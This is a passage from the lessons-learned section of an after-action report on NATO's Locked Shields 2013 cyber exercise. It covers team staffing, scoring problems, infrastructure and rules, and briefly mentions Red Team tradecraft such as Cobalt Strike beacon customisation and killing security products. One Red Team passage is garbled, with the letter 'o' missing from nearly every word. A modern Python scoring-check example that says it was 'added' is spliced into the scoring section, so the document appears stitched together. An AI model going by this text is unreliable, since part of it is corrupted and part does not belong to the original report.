5. The idea of engaging a professional journalist with the Media Simulation Cell seems good and another attempt should be made to make this happen. The planned real-life media embed did not happen. While this contributed to a more relaxed atmosphere, it probably had some drawbacks on the PR side.
6. The deadlines for finalising the infrastructure must be tighter to ensure that RT is properly prepared. The BT reference infrastructure should be over 90% ready at least a month before, so that RT can train several times on the actual finalised game system. This means that the Test Run may have to take place months before Execution, so that GT can make final changes and apply lessons learned. In a perfect world, the Test Run should already take place on the finalised game setup.
7. The documentation provided to the Blue Teams was good but should not be further extended. It was time-consuming to go through all the provided documentation. However, it should be the team leader's responsibility to read the full information package and emphasise the most important aspects to team members.
8. BTs should be encouraged to have their representatives attend the after action meeting. It was stated in the information packages that BTs are welcome to attend the after action meeting, but the importance of it was not emphasised. Remote participation in a whole-day meeting is not efficient.

9.2 Scenario

1. A short scenario (with a BLUF version) is enough for a technical exercise like LS13. Since the teams will not conduct detailed adversary analysis, nor develop operational plans beyond securing their own systems, a more comprehensive scenario would probably cause more harm than good.
2. The scenario development must find an acceptable balance of realism (could something like this happen in real life?) and feasibility (can we actually simulate the situation, networks and activities required?). The LS13 scenario worked. In general, it was realistic and consistent with the reality that the Armed Forces of a NATO nation could encounter. It was a little bit of a stretch in terms of there being two separate systems that a BT had to protect. The additional legal detail added role-play value, but was probably limited to the appreciation of the legal advisors.
3. The approach where each BT has to protect a similar network and where they are competing with each other has worked well, but there are alternative proposals: the game could be changed from competition between BTs to true cooperation between BTs. For example, BTs could be responsible for heterogeneous networks, not having exactly the same topologies. Also, this way the RT attack balancing approach could be avoided. The challenge for the BTs would be to keep the RT score under a certain level.
4. BTs should be presented with more forensic challenges such as malware analysis. During the after action meeting, 2 BTs expressed a feeling that they would have expected more bias towards incident handling and forensic analysis. However, realistic malware is too sophisticated to be analysed in 2 days, and the organisers have always tried to keep the exercise as a live event.
5. A major escalation of the situation should be considered where BTs receive a high number of simultaneous attacks. More successful teams expected that at some point in time the scenario would overmatch them, but it didn't happen. The Red Team campaign appeared to them to be more like a sequence of steps.

9.3 Teams

1. In order to improve the LS exercise with the same scope, most of the teams require more manpower:
   - Red: too large; difficult to coordinate and train.
   - White: too small.
   - Communications team: too small; there should be dedicated blondes in addition to liaison officers.
   - Scoring teams: too small.
   - Media: OK.
   - Yellow: OK.
   - Green: too small. OK during the preparation period, but cannot support more than 100 customers during execution. Work distribution should also be better.
   - Legal: too small.
2. All critical roles should be identified and duplicated. Duplicated leadership of WT proved useful on Day 0, when the WT leader was ill.
3. The requirements for technical competences in BTs should be defined in more detail. It should have been emphasised more that significant skills in web technologies are needed.
4. A small CERT team which coordinates the efforts between BTs should be assembled for the next exercise. There should be not more than 1-2 people assigned to this role.

9.4 White Team

1. White Team needs extra manpower and changes to some of the roles:
   - The liaison officer and blonde roles should be assigned to different people. One liaison and one blonde per team is suggested. Liaison officers reported that they were unable to maintain contact, awareness and workstation presence at the same time, even though we had a 10 to 10 ratio this year. It is difficult for one blonde to control more than 3 workstations (there were 12 per BT).
   - More people should be assigned to score SITREPs and OPS injects. There should be enough staffing to provide feedback to the BTs within one hour. A light-weight report scoring team needs 6 people per 10 BTs.
2. The activities of the blondes should be measurable. There was no centralised overview of how active the blondes for specific teams were, how quickly they reacted to RT requests to open some links, or how balanced the blonde campaign was towards different teams. Based on the feedback from RT members, it is clear that some BTs had to mitigate more threats as their blonde was plainly more active and responsive to RT requests.
3. A general communication rule should be enforced that all complaints, clarifications, etc. addressed to the WT will be processed through the Liaison Officers, who will then personally notify the appropriate WT officer. The Deputy WT leader was unable to constantly monitor the chat and white due to SITREP scoring and general coordination work. This could potentially result in requests/issues that are handled too late or totally missed.

9.5 Red Team

1. For the same scale of exercise as LS13, the core group of RT should have at least 10 people who must put a very serious effort into preparation and must be able to bring the rest of the volunteers up to speed very quickly. BTs are taking the exercise seriously and investing a significant amount of time into preparations. The infrastructure is more stable, so the BTs can focus on defending their systems rather than fighting with core-infra problems. They can also more easily integrate their own VMs with their custom tools into the environment. This all means that much more effort is required from the RT to keep the BTs challenged. Advanced skills such as capabilities to evade detection or kill security products become essential. Custom tools and custom simulated malware are needed.
2. Separate workshops and trainings for the RT members should be conducted before execution. Only a subgroup of the RT received specific trainings. Also, it was not possible to practise together on the LS13 infrastructure, which was not ready early enough.

51 In additin t imprving individual knwledge abut the bjectives, target systems, attack vectrs, etc. the team members need t learn each ther s skills. Even nline training wuld be beneficial. 3. The standard tls shuld be selected and lcked at least 2 mnths befre executin. Last minute changes shuld be avided, if pssible. Cbalt Strike came at shrt ntice and many RT members didn't have time t learn and custmise it (persistence, aut-migrate t smewhere else besides ntepad, beacn custmisatin withut default Win 98 user-agent header). Switch frm Backtrack5R3 t Kali happened because Backtrack5R3 Metasplit Framewrk and Armitage updating gt brken by develpers ne mnth befre LS13 executin. Switch frm Armitage t Cbalt Strike happened because f Beacn features and a last-minute permissin request frm the Authr. New experience with Kali and Cbalt Strike were appreciated. Hwever, familiarity with the tls and practice time suffered. 4. Usage f Cbalt Strike was a gd experience. Evaluating cmmercial versins f explitatin framewrks shuld be cnsidered fr their advanced features such as evasin techniques r reprting. 5. Technical slutin fr RT situatinal verview and prgress tracking needs further imprvement. N gd visual verview was available n which bjectives had been met and which had nt, etc. Mre infrmative screens abut RT attacks (started, succeeded, failed etc.) shuld be develped and shared n large displays. 6. Dedicated briefings fr RT members shuld be cnsidered s that everybdy can share their success/failure prblems. 7. The reprting prcess slws RT dwn cnsiderably and shuld be made mre light-weight. Verificatin and cmmunicatin f single task ften becmes a multi-hur prcess and may result in fllwing wrkflw: a. Is the service related t specific bjective actually up? Smetimes any initial scan r check culd result in blcks. Sme Blue Teams allwed nly 1 web request and blcked all fllwing requests, legitimate r nt. Is nly my Backtrack IP r the whle range blcked? 
Check with clleagues and with liaisns if necessary. b. If the service actually was up, prper functinality was nt always there. This has t then be cmmunicated thrugh the liaisns t the BTs. c. Only after previus checks are dne is it ften pssible t determine if vulnerability still exists and t cmplete the bjective. Ideas t make reprting easier: a. Prepare templates fr all bjectives and repetitins befrehand. b. Assign ne persn per RT t reprt. 51

8. It should be considered whether it is possible to make the attacks more realistic and have the RT members behave like real attackers, following all the phases that would be required in real situations. One option is to make at least one network segment unknown to the RT before the game starts.
a. As the RT was targeting 10 identical environments, they did not need to run all attack phases (reconnaissance, scanning and enumeration) against all the teams. They already knew where important configuration files were located, including the file that they had to steal. At some level it is possible to justify this: exactly the same web platform may be used by different organisations, and mass attacks against web applications are common. Still, the BT did not have any indication that they were a target before the successful attack was conducted.
b. Countermeasures like honeypots are rendered useless if the RT does not have any motivation to look for new systems.
c. The fact that the RT has full knowledge of the BT systems was directly objected to by one BT. It was not considered realistic. This is true, but building a realistic model of the world for the exercise is beyond the capabilities of the organisers. The RT has been provided with insider knowledge to make the event challenging to the BTs and to put their skills under serious test, but at minimal cost. BT members should take the following into account:
In the context of the exercise, the RT has serious time constraints. The RT cannot spend months on quiet reconnaissance. The BTs know the exact timeframe (only 2x8 hours) when the opposing forces will attack and have concentrated their efforts on defending during that short period.
Exercise networks are very simple compared to their real-world counterparts. There were only 12 workstations to protect, compared to the hundreds or even thousands one would usually have.
Exercise RT engagement cannot be compared to real offensive operations regarding funding. Essentially, the team members are volunteers. They are not highly motivated professionals who would spend months on preparations and who would be willing to introduce 0-day exploits, etc.
Scenarios where people with insider knowledge cooperate with the adversary are not unrealistic.
The organisers have tried to balance these aspects by providing the RT with full knowledge about the systems and by building unrealistically vulnerable networks.
The RT reported two suspected cases of illegal hack-back, but was unable to prove them. In the future, this could be an additional consideration for RTs. Note: this year we used this to generate additional role-playing elements via ad-hoc media and legal injects.
Much better capabilities to tell the offensive story of LS have to be developed. BTs cannot learn if they do not get detailed feedback about the attacks. Typical RT reports include hardly any technical details, so there is no fast way of providing feedback. Good ideas on what would be required to improve this situation have been provided by Raphael Mudge, the author of Cobalt Strike:

The RT should be provided with a summary of the most important rules and technical background information, not just a link to the page covering all of the rules. Although a considerable amount of documentation about the target systems was available, many RT members were not aware of that.
The blondes were asked to click, from workstations inside the BT networks, on links pointing to a web site running on ports other than 80 or 443. However, BTs were not required to keep outgoing TCP ports such as 88, 8090, 8080, 8800 and 8888 open, and those were often blocked.

9.6 Green Team
1. The amount of human resources in the GT was adequate for the preparation process. During Execution, the GT could not cope with the load of requests and tasks. Two people from the GT and one from the YT are required to focus only on autoscoring issues. Dedicated people should be available to play the Game ISP. BTs requested the use of MD5 authentication between BGP peers, but the Game ISP was non-cooperative due to lack of time. One of the planned WAN scenarios (cutting the links between BTs and ISPs) was not played out because the GT members were overloaded. Experienced Windows administrators should be part of the GT to build a proper Windows domain.
2. The GT needs proper procedures and a ticketing system for Execution. The ticketing system must be accessible to all participants. Collecting and responding to requests was messy. There were several chats, live people walking in, no central coordination, and no knowledge of who was handling the issue and what the expected resolution time was. Allocating coordination of this to a single person did not work. The wiki-based ticketing system was not used at all, as only WT/GT members could access it and create new tickets. The following fields are most important: creator, including team name/number; problematic object; unexpected/missing behaviour with exact details; impact (full team, many servers or single user/server); handler.
3. The GT access LAN should have exactly the same access policy as the VPN. As the access LAN was created at the last minute, there were some differences in accessing the management networks.

9.7 Legal Team
1. The LT should prepare sample answers to the injects so that it is easier to quickly provide proper feedback.

Legal advisors would have appreciated getting substantive feedback on their answers, and not only that expressed in the scores given.
2. For the same scale of exercise as LS13, there should be four instead of three lawyers in the WT to help with scoring the responses.

9.8 Yellow Team
1. The staffing for the YT was adequate, taking into account that the overload during Day 1 was expected. The reserve troop concept should have been better explained and emphasised to the BTs. One YT analyst was 75% focused on the reports coming in from the 10 BTs. One was acting as a BT reserve resource, a.k.a. reserve troop, monitoring communication and giving out clues. One was focusing on stress reporting. While one YT analyst mostly focused on going through the reports and instructing BTs on how to provide better reports, the YT reserve person focused mostly on chat and any ad hoc resources he could pull information from. The 'reserve troop' pointed out several BT-to-BT collaboration events which would have been missed if we had focused only on incident reports.

9.9 Communication
1. Communication with BTs during the game was much better than in previous years. Having one liaison officer per BT was a good decision. The challenge remains to engage well-prepared people for this role, such that they have a good background on the exercise and can answer the more common questions without overloading other WT and GT members with information requests.
2. When communicating with BTs, all WebEx sessions need to be run by one person. This person says whose turn it is to speak and what is expected. From an audience perspective there were too many chiefs: the exercise project lead, the WT lead, the WT deputy lead, the fictional coalition J6, the Comms chief. All of them were taking charge of the microphone at some point, in terms of the flow of the exercise. This might have been confusing for the Blues.
3. All WebEx sessions should be pre-announced. It was not clear enough that the YT highlight sessions could be observed over WebEx.
4. A camera operator is required at least for the hot-wash-up sessions and the after action meeting. Key people should have labels on their tables to make their role easily understandable. Often, someone other than the main presenter needed to comment on some aspects. It is difficult to follow the discussion when the person who talks is not in view.
5. Instead of WHITE, a CONTROL mail address should be used that is clearly for game administration, and not for 'in-game roles'. The same could be applied for chat. This should be clearly communicated to the BTs. Some BTs sent their inject responses to the white mailbox, instead of to the appropriate inject handler (HQ, legal, journalist).

6. The chat room solution and design needs further improvement. It was hard to follow all chats, which meant that some questions or issues were delayed or ignored. Both RT and BT members complained that reporting and other communication have to be on separate channels. The primary channel was flooded with hash-tagged messages on lightweight reports (open, close, update) and automatic responses from the Tweetbot. Another proposal was to have an option to turn the automatic responses from the Tweetbot on and off.
7. Potential side-channels should be identified and logged, if possible. A lot of communication occurred directly between different people, e.g. the client-side team and the blondes. These channels were not logged, which means potentially interesting data is missing for the after action analysis. One BT made a proposal to use different accounts for the different stakeholders in the same BT, i.e. one for legal (e.g. [email protected]), one for media (e.g. [email protected]) and one for operations (e.g. [email protected]). The WT should then send the injects to the appropriate mailbox.
8. BTs should be encouraged to use fixed line connectivity when holding on-line meetings. BT8 used WiFi for connecting to the final WebEx. This caused a choppy connection and they were not easy to understand.

9.10 Information Sharing and Collaboration
1. Information sharing between the BTs was not as beneficial as it could have been. The BT chat channel was overloaded. It was difficult to follow the flow of messages and understand how to help each other. The WT and YT should make sure BTs have motivation for more effective and useful information exchange. The common opinion among the BT members was that the ls13blue channel was misused. One reason could be that some teams thought that overloading the channel with information was the way to gain more points.
2. BTs should be encouraged to share the details of their VMs and the tools they used.

9.11 Situational Awareness
1. Clearer instructions should be provided to the BTs on what they are expected to report. The majority of lightweight reports were really not about incidents but rather about proactive measures. From the YT's perspective these are not important. From an after action analysis perspective they are very important. Also, it is a good way to provide the leader's overview of what the team has done.
2. The YT briefs were useful in giving an overview of the state of play. These should be continued.
3. There are some proposals on how to improve situational awareness during incidents. In the current list view of incidents, one has to open a separate incident to see important details like hostname, handler and impact. The following additional metadata would be valuable:
Hostname, identifying to what machine the incident is related.
Impact. A number 1, 2 or 3 indicating the impact, used to prioritise incidents.
Handler. An abbreviation identifying the person who opened the incident.
It should be possible to set the key values in the same way as those for status and tag.
4. The following proposals to improve VSRoom views were collected: the VSRoom view for the total scores table should be ordered by score, not by team.
5. A short summary of useful features of the collaboration environment and VSRoom should be developed: Shift + left-click to edit cells in metatables; ordering by column in metatables.
6. Stress reporting was a great experiment and gave excellent information about the status of each team. It should be further improved.

9.12 Scoring
1. BTs need more and clearer justification as to why specific scoring decisions were made. The WT needs more resources to be able to provide better feedback on scoring decisions. Eight out of 10 BTs expressed some level of dissatisfaction with the scoring system: no information was provided on how the availability scoring works; better justification behind the scores was expected; suggestions on how to avoid mistakes that led to negative points were missing (this was mainly related to attacks, and it would be possible to provide feedback only after the action). The focus on providing more details about scoring should make it possible for the BTs to learn from it.
2. More information about the scoring table should be given to the BTs before the exercise in order to make it more understandable. At least the maximums for each category and explicit scoring criteria should be disclosed. The rationale provided by one BT on why they need detailed scoring information reflected exactly the reason why it was not shared: to avoid a rat race and BTs focusing only on how to defeat the scoring system and pre-calculate a winning strategy:
BT1: "clearly give to BTs precise indication on how points are scored, in order to allow them to make clever decisions when it is necessary (e.g. is it better to ask for a revert of a machine or to lose service availability for one hour?)"
On the other hand, if the scoring is completely opaque it causes frustration and may have a negative impact on learning.
3. The internals of the automatic scoring system should be provided to the BTs. All available details on the reasons why a check failed (the scoring bot's error log) should be available to the BTs.

During Execution, the GT had to deal with a vast number of questions and complaints regarding availability checks. BTs claimed that their service was up and functional, but the scoring system reported that the check failed. In 99% of cases, the problem was on the BT's side:
The IP address of the scoring bot was blocked, or some other security measure prevented access to the service.
The password of the user account used by the scoring bot was changed without informing the WT/GT.
The scoring agent inside the workstations did not work after the modifications. Sometimes a process was considered suspicious and simply killed, or the applied GPOs disabled all scheduled tasks, including scoring.
One BT redirected HTTP connections to HTTPS. The standard OpenSSL library used by the scoring bot failed to establish a session against their MS IIS server (SSL handshake problem). However, accessing the webpage with the Firefox browser worked fine.
If BTs had the details, they could more easily fix their own problems.
4. Automated availability scoring needs to be further developed to detect broken functionality and other unfair tactics. It was not feasible to enforce all the rules. Therefore, the scoring system favoured teams using dishonest tactics: blocking user activities, changing or removing functionality, replacing web forms with stubs, and sanitising input in a way that breaks some functionality of the applications. Examples of additional features:
Check if it is possible to make complete transactions: log in, submit a form, send an e-mail, download a file over FTP.
Randomise the URLs requested by the scoring agents; BTs started whitelisting these links.
Ask for nonexistent pages and check service availability by receiving 404s.
This is a continuous finding, but the complexity of the task has delayed improvement. In addition, the web applications whose functionality should be checked are typically finalised immediately before the exercise, leaving no time to develop custom scoring checks.
5. Availability checks should be started during the preparation days to make sure that all services are working when the game starts.
6. A simple way to report user satisfaction or dissatisfaction with the systems should be developed. Blondes should have an easy way to provide feedback to BTs that workstations are slow (e.g. because BTs are running 2 AVs on them) or that some functionality of the system does not work. It could be implemented as an interactive map where it is possible to tag every system with a happy, neutral or angry face. Alternatively, there could be just a list of systems with buttons and an option to write a short comment on why the specific report was sent.
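As an added illustration of the scoring-check improvements proposed in items 3 and 4 above (an example written for this report's readers, not the LS13 scoring bot's code), the check below performs a complete transaction against a constructed stand-in web application, uses a random query string and a random nonexistent page so that a whitelist of fixed URLs does not pass, and returns the failure reason in a form that could be shared with the BT. The portal name, form path and the TLS, refused and timeout messages are assumptions for the demo.

```python
# Added example (not the LS13 scoring bot); the web application below is a constructed stand-in.
import http.server
import random
import socket
import ssl
import string
import threading
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass

@dataclass
class CheckResult:
    service: str
    ok: bool
    reason: str  # the detail a BT would need in order to fix the problem themselves

def _random_token(rng, n=10):
    return "".join(rng.choice(string.ascii_lowercase + string.digits) for _ in range(n))

def _fetch(url, data=None, timeout=5.0):
    """Return (status, body). A 4xx/5xx answer is a result, not an exception."""
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "Mozilla/5.0 (constructed agent)"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")

def check_web_service(base_url, expected_marker, rng=None):
    """Three-step functional check; every failure names its probable cause."""
    rng = rng or random.Random()
    name = urllib.parse.urlsplit(base_url).netloc
    try:
        # 1. Front page with a random query string: a whitelist of fixed scoring URLs will not match it.
        status, body = _fetch(f"{base_url}/?nocache={_random_token(rng)}")
        if status != 200:
            return CheckResult(name, False, f"front page returned HTTP {status}")
        if expected_marker not in body:
            return CheckResult(name, False, "front page served but expected content missing (stub page?)")
        # 2. A page that cannot exist must yield 404: shows the real application answered, not a dummy.
        status, _ = _fetch(f"{base_url}/{_random_token(rng)}.html")
        if status != 404:
            return CheckResult(name, False, f"nonexistent page returned HTTP {status} instead of 404")
        # 3. A complete transaction: submit a form and verify the application processed the input.
        token = _random_token(rng)
        status, body = _fetch(f"{base_url}/form", data=urllib.parse.urlencode({"comment": token}).encode())
        if status != 200 or token not in body:
            return CheckResult(name, False, "form accepted but input not processed (stubbed or over-sanitised)")
        return CheckResult(name, True, "all checks passed")
    except urllib.error.URLError as err:
        cause = err.reason
        if isinstance(cause, ssl.SSLError):
            return CheckResult(name, False, f"TLS handshake failed: {cause}")
        if isinstance(cause, ConnectionRefusedError):
            return CheckResult(name, False, "connection refused (service down, or scoring bot IP blocked?)")
        if isinstance(cause, socket.timeout):
            return CheckResult(name, False, "connection timed out (filtered by a firewall?)")
        return CheckResult(name, False, f"connection error: {cause}")

class _DemoApp(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a BT web application; stubbed=True mimics a form replaced by a stub."""
    stubbed = False

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _send(self, status, body):
        payload = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def do_GET(self):
        if self.path == "/" or self.path.startswith("/?"):
            self._send(200, "<h1>Aid organisation portal</h1>")
        else:
            self._send(404, "not found")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        if self.path != "/form":
            self._send(404, "not found")
        elif self.stubbed:
            self._send(200, "Thank you")  # looks alive, but the submitted data is discarded
        else:
            self._send(200, "Posted: " + fields.get("comment", [""])[0])

def start_demo_app(stubbed=False):
    """Start the constructed application on a free loopback port; returns (server, base_url)."""
    handler = type("Handler", (_DemoApp,), {"stubbed": stubbed})
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"
```

Running `check_web_service` against `start_demo_app()` passes, while `start_demo_app(stubbed=True)` fails with the "input not processed" reason even though the stubbed form answers 200, which is exactly the case a plain availability probe cannot see.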

A bot should write the report to a specific BT channel to get their attention. After e.g. 15 minutes the bot should ask the blonde to confirm whether anything changed; if not, a negative score should be automatically assigned. The RT should also have read access to this map for feedback.
7. The background brief or game rules should explain that, while we endeavour to ensure fair scoring and RT pressure, it will likely not be ideal. The point of the exercise is not to get the most points, but to learn from it. Therefore, competition for points is discouraged and a good sense of humour is appreciated.
8. BTs should see the scores and scoring rationale for other BTs, in order to learn from the mistakes and successes of others. A delay should be incorporated in this to ensure fairness. The mechanism needs to be communicated very clearly.
9. Verifying RT reports is still problematic. It should be automated as much as possible, for example through the use of flags (the RT steals a flag and uploads it to the scoring system as proof of a successful attack; the RT places flags on compromised systems that the scoring bots can 'see'; etc.).
10. A scoring checklist for every category should be developed to facilitate faster scoring. It takes hours to score 10 SITREPs. However, there is little chance to cross-reference reported events with real events.
11. Injects should be designed so that scores can be assigned within one hour of the end of the inject. This can be achieved with better planning or increased manpower in the inject teams. Inject scores for OPS and legal were determined and input too late. BTs had no chance to learn during the game.
12. Media worked well and they managed to keep the scores coming in throughout the game.
13. Excessive information sharing should give negative points, not positive. The BT chat was spammed with helpful information as BTs tried to score cooperation points. Sometimes the messages were generic and did not provide useful information.
14. Periodic assessments of lightweight reporting and cooperation (chat) work better than individual report scoring, in terms of maintaining scoring balance. The method of scoring the lightweight reports was changed on the fly due to the massive number of reports coming in. An aggregate hourly score was assigned instead of giving points for each separate report. This was good to keep the scores balanced, but it also introduced a new problem: it was not clear to the BTs how they could improve reporting and what the evaluators understood as a good report.
15. SLA bonus scoring should be automated. Sharing SLA percentages with the BTs gave the GT a lot of investigation work.

9.13 Technical Environment
Core Infrastructure
1. The technical infrastructure of EDF was stable, and no major downtime occurred, in contrast to previous years. At minimum, the following improvements are required (to conduct an exercise on the same scale as LS13) to increase performance:
Each team server should have at least 96GB RAM. The recommended option is to add another server with the same capacity per team (12 cores, 96 GB RAM).
The storage server should have 20 additional 10k disks in the 10k-disk pool to improve team LUN performance. This pool should be converted to RAID5.
Switching infrastructure should be upgraded to allow more than 256 VLANs.
2. The components of the infrastructure must be built and tested taking into account the number of users during main Execution. At the beginning of Day 0 the mail server (mail.ex) was not working properly because of a low number of maximum allowed sessions. Apparently, the Dovecot POP3/IMAP server had changed default values in its latest version, which was unexpected. A similar problem occurred with the collaboration platform (a small default setting for the number of simultaneous clients in Ubuntu's Apache configuration).
3. At least 2 BTs faced issues with the VPN boxes. DHL delivered the wrong box to BT10. The radio part of the BT1 VPN box was malfunctioning (5 GHz transceiver). Wired connections had no problems.
4. QoS on the central VPN/FW device should be configured. The traffic required for remote access to the environment (MGMT zone) should have priority over Internet traffic initiated from the Gamenet.
Collaboration, SA and Scoring Platform
1. The scoring system crashed during the game, resulting in general confusion and delayed scores. The problem was in one specific setting of the collaboration environment (the xmpp-rate-limit setting was not enabled to protect against peaks in data). Based on experience, this kind of issue always happens right before VIP visits. The YT and GT should plan accordingly.
2. The system to submit and score SITREPs has several usability flaws.
a. The BT is able to modify the SITREP after the deadline. This was mitigated by opening the reports in separate browser tabs when the deadline arrived. It is still a problem, since a late submission may not be discovered and it may be confusing to determine which version to score: the one that was submitted on time? the one that was updated before the deadline? the most detailed one that was updated 15 minutes late? While it is possible to track this from the wiki change log, it is cumbersome. Recommendation: use a submit button that allows the report to be uploaded to the scoring page. Each report can be submitted once.
b. The BT is able to submit multiple reports for the same time period (this happened once during LS13). This is confusing to the scorer, especially if both reports contain some information (no dummy reports). Recommendation: allow only one SITREP to be submitted per time period.

c. The scorer needs to navigate to a different wiki page in order to score the SITREP. Recommendation: find a way to assign the SITREP score on the wiki page that has the actual report.
3. A strict wiki form for SITREPs should be enforced. One team submitted the SITREP as a file attachment to the wiki page.
4. The inject score and special score wiki solutions worked well.
Gamenet
1. The traffic generator system experienced many problems during the exercise, and it did not generate the anticipated volume of traffic.
Agents were not launched on ws1* machines due to a name mismatch in the scheduled tasks.
The agents were using port 8181 to connect to the coordinator, but the BTs were not required to keep that outgoing port open.
The agents were stopped because of BT activities: killing the Java process; disabling scheduled tasks; installing sandbox software that prevented all of the agent's activities.
There were issues with parsing the HTML code of compromised pages.
Mail traffic was limited due to port 25 being blocked.
2. The traffic generator and automatic scoring system have to be combined. This is the only method that motivates BTs to keep the traffic agents running and functional.
3. Traffic agent development ideas: more 'real noise' in the Gamenet; more bots that do just 'half-broken' stuff (typos in URLs, ...); make sure the User-Agent in HTTP requests is not something distinguishable (like Java/1.7.0_17 or Java/1.7.0_21).
4. The feasibility of automating clicking to some degree should be explored. AutoIt is one possible solution that has been used in other cyber ranges.
5. Virtual machines should be allocated enough resources. Some Windows 7 workstations had only 10GB of disk. They became full and scoring failed. BTs need more resources for their own VMs. Four vCPUs and 4GB RAM are often the minimum they request.
6. The network design of the technical environment needs to be reconsidered. The computers of WT members who are not responsible for playing blondes should be placed in a separate segment. Access to collaboration tools such as chat channels, wiki and Skype must not be affected by potential disruptions in the Gamenet.

The BT service-checking machine (btx.ex) should be placed into the network segment from which the availability checks are done. Any attempts by BTs to scan those networks must be forbidden.
7. Some required features for VM management that were identified during the Test Run were not implemented correctly: copy-paste between the management host and virtual machines (this is especially important for the blondes to copy-paste links from Jabber to a VM); shared folders between workstations.
8. The news portal settings should be tested before the game to make sure all required functionality exists. It was not possible to upload images to the blog. In the beginning, comments required moderation, but this was solved quickly.
9. Giving the BTs some responsibility for the WAN infrastructure made the exercise more interesting and realistic. This should be taken to the next step. The beta image of the Cisco CSR 1000v virtual router worked without issues. The limitation of 50Mbps was never reported as a problem. One BT had connectivity issues, but after action analysis proved that this was their configuration mistake (improper use of 'ip verify unicast reverse-path'). Only 1 out of 2 planned WAN scenarios was played out due to GT members being overloaded.
10. The Gamenet and Blue Team systems should be more variable, advanced and interesting. Examples of components to consider:
IPv6.
More custom and legacy systems: Oracle and/or DB2 databases, some very old z/OS boxes, Unix servers.
Mobile device emulators (older versions of Android and iOS).
More encrypted protocols to force detection to the application level (more applications using HTTPS, encrypted e-mails).
Simulated satellite connections.

9.14 Rules
1. A specific rule in the RE should be written which states that the WT leader can decide to revert BT machines. The WT leader decided to revert certain BT machines in order to get them to comply with the rules. One BT objected to this.
2. The BT size limit should be set to 12, including legal advisors. In addition, the limit on BT size should grow when more challenging environments and components are introduced. For instance, BT2 would have felt more comfortable had they had 15 members in a team instead of the current limit.
3. There is a potential problem with the game complaint mechanism, which states that complaints about events that occur during the game must be raised within two hours of the event, and responded to within two hours of receipt. The issue is with events that occur at the end of the playing day, in the last two hours of each day. Since the complaints need to be raised through the Liaisons (who are not there after the game is stopped for the day), the BTs do not have a way to raise complaints. Recommendation: either change the process to ignore the intervening night (an event in the last hour of Day 1 can be reported and responded to at the beginning of Day 2; events at the end of Day 2 will be added to the final score complaints) or come up with some other solution.
4. A 72 hour final complaint processing window is long enough. The complaint collection in the real-life system is OK. However, the exact complaint window should be announced during the scoring brief, detailing the latest time a complaint can be made.
5. This year two former RT members defected to the Blues. The knowledge of key decision-makers (and their thought processes) and of scoring processes possibly gave them an advantage, as evidenced by the 1st and 2nd places that their teams achieved this year. This also raises an interesting issue: the potential of WT, GT, RT or YT members joining BTs during the planning process. Recommendation: enforce a general planning rule that, once a person has joined the exercise planning team in any capacity, they will not be allowed to participate in a BT for that year's exercise. They are free to join the following year's exercise. Recommendation: enforce a general planning rule that people who are leaving the planning team will lose access to the planning environment.
6. The rules regulating what the BTs are allowed to do in the technical environment need to be improved. Some teams take a narrow view of the rules. Although the motivation behind a rule should be understandable, BTs start to play with the details. Therefore those details should be made clearer: What kind of software must remain installed on the servers? What kind of services must be provided? What are the exact requirements for communication flows (firewall rules)? What does 'patching is not allowed' mean? Are custom modifications to source code allowed? What are the requirements for the performance of systems and services? Another problem that should be avoided is the updating of the rules. This was done because clarifications were requested by the BTs. Some rules were considered too restrictive (such as not being able to fix vulnerabilities with custom modifications to WordPress, or enabling NFS on one system). In general, BTs accepted that restrictions are necessary to keep the exercise interesting and challenging.
7. The most widespread defence method was just to block any suspicious IP addresses. This is an easy way to kill the game and should be made more difficult. Firstly, better legitimate traffic generation would help. Secondly, blocking could be restricted with some rules, as proposed by an RT member: BTs should be required to provide services to clients which are infected. In addition, many clients could come through the same proxy or NAT device, so blocking a malicious one could also block legitimate users.

9.15 Administrative Issues
1. The facilities should be changed to improve communication and coordination between the teams. The common room for the WT, LT and YT was fairly crowded. The RT was split into 2 rooms, but was otherwise satisfied. The GT room was half-empty. It would be better to situate all WT, LT, GT and YT members in one room and all RT members in a second big room. The rooms must be near each other. One conference room which could be split by a party wall would be perfect to enable common feedback sessions.
2. The following aspects should be taken into account when preparing the facilities:
RT seating should be more shoulder-to-shoulder to improve communication.
Zulu time clocks should be placed on the walls of each room, and all systems, including the ones used for WebEx, should be configured to Zulu.
Printers have to be available in the main control room and the RT room.
WT liaison officers and clickers must have large format monitors.
Visitors should not block the hall and the entrance to the control rooms. This happened for 30 minutes when the last critical attacks were conducted.

10 Acknowledgements
NATO CCD COE would like to thank all our partners who helped to organise LS13 for their significant contribution, and all Blue Team members for making the exercise a remarkable experience. In particular, we wish to thank the Estonian Information System's Authority, Estonian Defence Forces, Estonian Cyber Defence League, Finnish Defence Forces, Finnish Communications Regulatory Authority, NATO Computer Incident Response Capability Technical Centre, Swedish National Defence College, France General Directorate for Armament, Polish Ministry of National Defence, CERT-LV, Cisco Systems, Clarified Networks, XenSense, Clarified Security, ByteLife, IT Centrs, Stonesoft, and Raphael Mudge and Jussi Jaakonaho.

11 Acronyms
BT - Blue Team
NATO CCD COE - NATO Cooperative Cyber Defence Centre of Excellence
C&C - Command and Control
CDX - Cyber Defence Exercise
CND - Computer Network Defence
CS - Client-Side Team
ECDL - Estonian Cyber Defence League
FDF - Finnish Defence Forces
FPC - Final Planning Conference
GT - Green Team
HQ - Headquarters
IPC - Initial Planning Conference
LS - Locked Shields
LT - Legal Team
MPC - Main Planning Conference
POC - Point of Contact
PTH - Pass-the-Hash
RDP - Remote Desktop Protocol
RT - Red Team
SA - Situational Awareness
VM - Virtual Machine
WT - White Team
YT - Yellow Team

Contents
1. Blue Teams
2. Legal Advisors
3. Red Team
4. White Team
5. Green Team
6. Yellow Team

1. Blue Teams
1.1. Description
Blue Teams were the main training audience of the LS13 exercise. They had the following main tasks:
